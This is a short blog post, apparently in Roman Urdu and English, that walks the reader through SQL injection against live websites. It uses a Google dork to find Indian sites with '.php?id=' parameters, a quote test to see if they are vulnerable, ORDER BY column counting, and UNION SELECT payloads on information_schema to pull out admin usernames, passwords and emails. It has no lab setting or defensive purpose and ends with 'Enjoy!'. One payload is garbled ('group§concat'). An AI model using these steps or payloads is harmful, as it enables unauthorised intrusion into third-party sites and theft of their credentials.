Sub se pehle Google.co.in open karen. Wahan ye dork likhen:
inurl:.php?id=
Phir left side par Pages from India par click kar den.
Aap k paas Indian Sites aa jayengi.
Ab kisi bhi link ko open karen. Site kuch aisi hogi:
Www.Site.com/index.php?id=5
Lets see thats its Vulnerable or not. Type ' after id=5
The site will be like this:
Www.Site.com/index.php?id=5'
If it gives error, It means its Vulnerable to Hack.
Ab is k Columns find karen.
id=5 order by 1--
id=5 order by 2--
Isi tarah numbers barhate rahen jab tak error na aa jaye. For example, Agar 6 par error aaya to is k 5 Columns hain. Now find valid Column to attack on Site.
id=-5 union all select 1,2,3,4,5--
Agar is ka 2nd Column valid ho to hum is Column k through database aur tables find karenge.
Find its database version
id=5 union all select 1,@@version,3,4,5--
Agar is ka Database version 5 ho to hum easily tables maloom kar sakte hain. Agar 4 ho to humein table guess karna parrta hai. Table finding for version 5
id=5 union all select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--
Is se Site k tables aa jayenge. Hamein Admin ka data (Username,Pass) chahiye. Agar admin table tbl_admin etc ho to is ka Column find karenge
id=5 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name='tbl_admin'
Is se admin table k columns aa jayenge. Like Username,Password etc.
Now final step. Ab hum Admin data hasil karenge. Agar columns hon Admin, Password, Email to hum ye sub find karenge
id=5 union all select 1,group§concat(Username,0x3a,Password,0x3a,Email)
Aap k paas aapke kaam ki cheez aa jayegi. Yani Admin Id, Email aur Pass. Enjoy!
Nice share
ReplyDeleteWebhosting in pakistan